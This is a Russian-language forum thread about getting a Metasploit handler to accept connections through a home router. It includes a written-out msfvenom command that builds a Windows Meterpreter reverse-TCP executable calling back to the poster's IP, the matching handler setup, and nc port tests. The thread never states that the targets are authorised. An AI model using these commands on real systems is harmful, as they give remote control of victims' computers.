Проблема с Metasploit

Discussion in 'Песочница' started by Vovo4ka, 9 Feb 2018.

  1. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Доброго времени суток. Возникла проблема с Metasploit'oм. Хотя, если задуматься, то виноват вовсе не он.
    Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524. Простая попытка открыть порт через iptables, разумеется, не дала ничего. Я, начитавшись информации про ошибку в Метасплоите, которая возникала из-за невозможности подключиться к порту 4444 в гугле, стал сетовать на роутер. Добавил на нем правило, пробросив этот порт. Однако ничего не изменилось.
    Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет. Думаю попробовать банально удалить эту утиллиту, но мне интересно, сталкивался ли кто-либо с подобным? И как исправлял?
    Ах да, подобная трабла наблюдается у меня минимум на трех устройствах: ПК, ноутбук и телефон (!) с установленным termux.
     
  2. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    nmap его не видит, а просто сообщает какая служба обычно использует этот порт, не конкретно на твоей машине,а вообще
    порт открывает программа, которая собирается с ним работать, iptables лишь разрешает или запрещает обращаться к этому порту
    он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт на другом интерфейсе
     
    #2 dmax0fw, 9 Feb 2018
    Last edited: 9 Feb 2018
  3. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    То есть handler может работать только с локальными адресами?
     
  4. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    нет
    в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс
     
    Vovo4ka likes this.
  5. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Ну, роутер отпадает: я пробросил порт 4444. Машины разные, сомневаюсь, что на всех одна и та же проблема с файрволом возможна. Значит, дело в самом Метасплоите. Хорошо, спасибо, буду разбираться
     
  6. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Он может работать даже с 0.0.0.0
    lsof -i | grep 4444
     
    _________________________
  7. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Code:
    root@kali:~# lsof -i | grep 4444
    root@kali:~#
    
     
  8. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Какой модуль используешь для запуска?
     
    _________________________
  9. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    multi/handler
     
    #9 Vovo4ka, 9 Feb 2018
    Last edited: 10 Feb 2018
  10. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    pkill -9 ruby и после попробуй запускать.
     
  11. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Не дало решительным образом ничего.
    Code:
    root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 333 bytes
    Final size of exe file: 73802 bytes
    root@kali:~# ls
    Desktop  Documents  Downloads  programm.exe  Music  Pictures  Public  Templates  Videos
    root@kali:~# pkill -9 ruby
    root@kali:~# msfconsole
     ______________________________________________________________________________
    |                                                                              |
    |                          3Kom SuperHack II Logon                             |
    |______________________________________________________________________________|
    |                                                                              |
    |                                                                              |
    |                                                                              |
    |                 User Name:          [   security    ]                        |
    |                                                                              |
    |                 Password:           [               ]                        |
    |                                                                              |
    |                                                                              |
    |                                                                              |
    |                                   [ OK ]                                     |
    |______________________________________________________________________________|
    |                                                                              |
    |                                                       https://metasploit.com |
    |______________________________________________________________________________|
    
    
           =[ metasploit v4.16.15-dev                         ]
    + -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
    + -- --=[ 503 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use multi/handler/
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 109.---.--.---
    LHOST => 109.---.--.---
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(handler) > exploit
    [*] Exploit running as background job 0.
    
    [-] Handler failed to bind to 109.252.62.124:4444:-  -
    [*] Started reverse TCP handler on 0.0.0.0:4444
    msf exploit(handler) > exit
     
  12. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
    но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе
    а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc <ip_роутера> 4444
    если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
    а дальше уже плясать от этого
     
  13. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?
    Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.
    Ладно, буду изучать в этом направлении подробней. Спасибо!
     
  14. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    локальный ip машины на которой запущен метасплоит
    вижу ты не совсем понимаешь суть проброса портов
    когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
    метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
    ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
     
  15. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо
     
  16. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    [​IMG]
    Верно ли я настроил проброску?
     
  17. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.
     
  18. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    разрядность винды какая ?
     
  20. Vovo4ka

    Vovo4ka Member

    Joined:
    24 Nov 2016
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.
     
Loading...
Similar Threads - Проблема Metasploit
  1. Dobi768
    Replies:
    14
    Views:
    4,429
  2. Dobi768
    Replies:
    20
    Views:
    5,204